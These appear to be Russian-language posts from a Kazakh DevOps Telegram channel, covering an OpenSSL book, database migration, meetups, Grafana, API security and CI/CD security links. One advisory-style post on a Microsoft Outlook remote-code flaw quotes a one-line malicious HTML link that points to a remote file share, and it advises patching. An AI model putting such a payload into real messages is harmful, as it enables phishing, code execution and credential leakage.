KazDevOps

🔐OpenSSL 3: ключ к тайнам криптографии.

Современный интернет кишит червями, троянцами, незаконными посредниками и другими угрозами. Защита от них в наше время приобретает особую значимость. OpenSSL — один из самых широко используемых и важных проектов с открытым исходным кодом в интернете — предназначен для обеспечения сетевой безопасности. Из этой книги вы узнаете о самых важных возможностях OpenSSL и о его широком потенциале. Приводятся пошаговые объяснения основ криптографии и сетевой безопасности, а также практические примеры, иллюстрирующие эти идеи. Прочитав книгу, вы сможете реализовать криптографическую защиту и TLS в своих приложениях и сетевой инфраструктуре. Издание будет полезно разработчикам ПО, системным администраторам, инженерам по сетевой безопасности и специалистам по DevOps.

🔶Автор: А. Хлебников 🔶Год: 2023 Архив Программиста

В ноябре 2023 года команда Quay.io перенесла базу данных c MySQL на Postgres. Хотя сама миграция прошла довольно гладко, для клиента это было не так. Девопсы отметили нестабильность до и после миграции. Проблемы, с которыми они столкнулись, были связаны с увеличением трафика и различиями в поведении MySQL и Postgres под нагрузкой. 👉 Читайте интересный западных кейс, который поможет избежать подобных ошибок. 📝 Стек: ➖ Облачная платформа: Amazon Web Services (AWS) ➖ Сервисы баз данных: от MySQL до Amazon Aurora Postgres ➖ Инструмент миграции: AWS Data Migration Service (DMS) ➖ Платформа разработки: Red Hat OpenShift ➖ Хранилище: Amazon S3 #devops #postgres #mysql @DevOpsKaz

На мероприятии «Impact the Future» вы сможете: 🔹 Познакомиться с удивительными историями женщин-лидеров. 🔹 Узнать о последних тенденциях в мире IT и AI технологий. 🔹 Задать вопросы и обсудить актуальные темы с профессионалами отрасли. ▪️Дата: 16 марта ▪️Время: 09.30 - 16.00 ▪️Место: Алматы Менеджмент Университет (Розыбакиева 227) Организаторы мероприятия – ведущие казахстанские IT-сообщества, которые объединились, чтобы подарить вам незабываемый день, наполненный вдохновением и новыми возможностями! 🚀 Мы поддерживаем женщин в IT, создавая более разнообразное пространство, поощряем их активное участие и вдохновляем на успешную карьеру в этой области. Не упустите возможность встретиться с теми, кто делает будущее уже сегодня! Регистрируйтесь по ссылке: https://gdg.community.dev/e/mckgdq/

500+ докладов с конференций Kubernetes за 2023 год Кто-то очень сильно заморочился. Забирайте и делитесь с коллегами 🤝 #devops #k8s #kubernetes @DevOpsKaz

🔥 Возьмем на себя ваши задачи Наша компания в режиме 24/7 помогает решать бизнес-задачи максимально эффективно — под каждую у нас есть свои спецы, которые рождены, чтобы умереть сражаться за ваши проекты. ➖ Аудит инфраструктуры ➖ Миграция в облако ➖ DevSecOps ➖ BigData ➖ Нагрузочное тестирование ➖ Web 3.0 @DevOpsKaz

☄️ Как хранить и обновлять информацию об SSL-сертификате без перезапуска Nginx ➖ Задаем зону в памяти ➖ Указываем динамические значения сертификата и ключа в этой зоне ➖ Задаем отдельный location для очистки кэша зоны ➖ Получаем возможность динамически подгружать в конфигурацию Nginx сертификаты после их обновления. 👉 Узнать подробнее 👉 Пример конфига 👉 Готовое решение #devops #nginx #acme #ssl @DevOpsKaz

☄️ Онлайн-вебинар «Как стартап Jasaim внедряет NFT-дипломы в вузах РК, Дубай и США» — сегодня, 9 марта в 17:00 по времени Астаны 🙋🏻‍♂️🙋🏽‍♂️ На вебинаре будут CEO стартапа Jasaim, Сырым Сериков и методолог Devpractice (учебно-методический центр на базе компании qazdev) Фёдор Чангариди. 🔍 Что вас ждёт: 🔹 Узнаете, как технология NFT меняет ландшафт образования и создаёт уникальные возможности для студентов и университетов. 🔸 Опыт эксперта: Сырым Сериков — CEO Jasaim и выпускник престижных программ K-Pro 7, Nuris Quickstart и Draper University. 🔹 Интересные кейсы применения NFT-дипломов в образовательной сфере и как они могут быть внедрены в вашем университете. 👉 Присоединяйтесь по ссылке

🔥 Microsoft: бесплатные ваучеры на экзамены 👉 Регистрируйтесь, выполняйте задание и забирайте ваучер на один из экзаменов: · AI-900 Azure AI Fundamentals · AI-102 Azure AI Engineer · DP-100 Azure Data Scientist · DP-600 Fabrics Analytics Engineer Cloud Skills Challenge позволит получить 1 ваучер на экзамен. Каждое задание привязано к соответствующему экзамену. 👉 Вот официальные правила 🚩 Челлендж продлится с 19 марта по 19 апреля 2024 г. @DevOpsKaz

❤️ Поздравляем наших прекрасных женщин с праздником 8 марта — у нас их целых 15%. Пусть любовь и добро сопровождают вас всегда! И вы своих поздравить не забудьте! А то знаем мы вас — от компа не оторвать 😁😜

Servercore открывает новую зону доступности в Ташкенте Servercore — провайдер IT-инфраструктуры с зонами доступности в Ташкенте и Алматы. Среди клиентов — Uzum Nasiya, Alif, Samarkand Air и HWG Sababa. Клиентам провайдера стала доступна новая зона доступности в Ташкенте. Размещение в двух объединенных общей сетью пулах позволит: — увеличить отказоустойчивость IT-систем и сервисов, — повысить уровень безопасности хранения данных, — снизить задержку при обслуживании конечных пользователей. В новой зоне доступности для клиентов Servercore стали доступны: — облачные серверы в пуле UZ-2 на базе AMD EPYC 7713 Milan, — выделенные серверы в TAS-2 на базе процессоров Intel Xeon E-2236, Intel Xeon W-2255 и Intel Xeon Silver 4214R. Безопасность и надежность новой зоны доступности подтверждена международным стандартом по информационной безопасности ISO 27001. Все сервисы Servercore соответствуют международному стандарту безопасности данных PCI DSS. Переходите на сайт, чтобы узнать больше

🔥 Релиз Grafana 10.4 Улучшили Grafana Alerting, обновили визуализацию, внедрили новый плагин и многое другое. Например, теперь есть инструмент предварительного просмотра миграции оповещений в Grafana Alerting — можно просматривать, редактировать и удалять перенесенные правила перед переключением. Также упростили маршрутизацию уведомлений. Новый плагин позволяет пользователям напрямую запрашивать и визуализировать данные из SurrealDB в Grafana. 👉 Посмотрите весь список обновлений 🚩 Еще разработчики сообщили о прекращении поддержки AngularJS в Grafana — и рассказали как подготовиттся. А для тех, кто еще не пользовался Grafana, предлагаем глянуть мастер-класс Grafana as code — может, захотите попробовать 😜 #devops #grafana @DevOpsKaz

☁️ VK Cloud Meetup: Облачные технологии Это возможность узнать о современных облачных технологиях, архитектурных решениях и Cloud-Native подходах. Спикеры поделятся трендами, кейсами и методами эффективного внедрения инструментов, оптимизации процессов и работы в команде. 🎙 Арман Нургалиев — Cloud Architect в Core24/7, автор статей канала KazDevOps. Мигрировал и внедрял более 40 проектов в публичных облаках при помощи terraform. 🎙 Александр Волынский — технический менеджер продукта VK Cloud. Более 15 лет опыта создания и внедрения решений для обработки данных на базе облачных сервисов. Эксперт в области Data Science и Data Engineering. 🎙 Сергей Смирнов — CPO облачной платформы bult.pro, TSARKA. Имеет 10-летний опыт в разработке приложений и высоконагруженных систем, работал в инфраструктурных командах Яндекса. 🚀 Приглашаем всех заинтересованных присоединиться к обсуждению и обмену опытом! Формат митапа — оффлайн, но также будет онлайн-трансляция. 🗓 Дата: 14 марта (четверг) 2024 🕰 Начало: 13:00 📍 Место: Most IT Hub, Ходжанова, 2/2 👉 Регистрируйтесь здесь Ждем вас на митапе!

🔥 Как устроен тренажер подготовки к экзамену CKS и CKA(D) В феврале мы писали про платформу обучения SRE, которая поможет подготовиться к экзаменам CKA, CKS и CKAD. Вам зашло! 👉 Сегодня делимся видеоподкастом, где люди, причастные к платформе, обсуждают, как и чем она живет и много всего интересного: ➖ Стоит ли брать курс от Linux Foundation для подготовки к CKS ➖ Как проходит сам экзамен CKS ➖ Что из себя представляет платформа ➖ Откуда берутся сценарии для заданий ➖ Как проходит проверка заданий ➖ Важное обновление экзаменов Kubernetes ➖ Сколько стоит запустить МОК-экзамен 👉 Ссылка на платформу #devops #cka #cks #ckad #kubernetes #aws #eks @DevOpsKaz

🛡 Защита API — узнайте, как повысить безопасность с помощью подробного руководства 👉 В статье вы узнаете про: ➖ Целенаправленное использование JWT ➖ Механизмы безопасного хранения ➖ Заявление об использовании токена ➖ Управление временными метками ➖ Безопасное использование алгоритмов при разработке API ➖ Подписание и проверка ➖ Безопасное управление ключами ➖ Использование хранилищ ключей Пользуйтесь и делитесь с коллегами 🤝 #devsecops #devops #api #apisecurity @DevOpsKaz

Фреймворк для создания сетевых сервисов Платформа Pingora — среда Rust для создания программируемых сетевых сервисов. Открытый исходный код, безопасность, асинхронность и многопоточность. Помогает создавать сервисы поверх HTTP/1 и HTTP/2, TLS или TCP/UDP. В качестве прокси-сервера он поддерживает сквозное проксирование. Поддерживает как широко используемые библиотеки OpenSSL, так и BoringSSL, которые соответствуют требованиям FIPS и пост-квантовому шифрованию. #devops #rust @DevOpsKaz

☄️ Список ресурсов по безопасности CI/CD 👉 Что есть в репозитории: ➖ Риски CI/CD, ошибки конфигурации, статьи про их эксплуатацию и т.д. ➖ Безопасность GitLab CI, Jenkins, GitHub Actions ➖ ArgoCD и настройки в защищенном исполнении ➖ Наборы видеоматериалов ➖ Репозитории с полезными материалами и playground ➖ Примеры реализованных атак на CI/CD #cicd #devops #gitlab #jenkins @DevOpsKaz

Публичный эксплойт на критическую уязвимость Microsoft Outlook Буквально сегодня в публичном доступе появился эксплойт в виде Poc (Proof of concept) для всех современных версий Outlook. Эксплойт позволяет выполнить удаленный код с правами приложения в обход всех проверок Майкрософт! Оказалось, для обхода всех проверок и механизмов защиты достаточно в конец расширения документа добавить восклицательный знак. Пример исследователей Check Point: *<a href="file:///\\10.10.111.111\test\test.rtf!something">CLICK ME</a>* От жертвы необходимо лишь нажать на ссылку в письме и код будет выполнен. Очевидно, что уязвимость будет максимально широко использоваться в фишинге. Для защиты рекомендуется как можно быстрее установить обновление приложения. Подробное описание уязвимости тут. Оригинальное исследование тут.

Большая онлайн-встреча с лидерами веб и мобильного рынка пройдет уже сегодня🔖 Обсудим, с какими проблемами мы столкнулись в 2023 году и какие строим планы по развитию на 2024 год. Подключайтесь в 18:00 по ссылке 🔗 Участники: — Иван Клюкин СЕО из Synaptik — Анатолий Дубенчак СЕО из Пиксель Плюс — CEО Дима Юрин, Делаем IT — СЕО Александр Комбаров из Пиробайта — Вячеслав Кислицын СЕО из Reactive — Дима Балыкин Сo-founder из Сedro Приглашенный эксперт: Петр Федюшкин — Директор Partners’ Club by AGIMA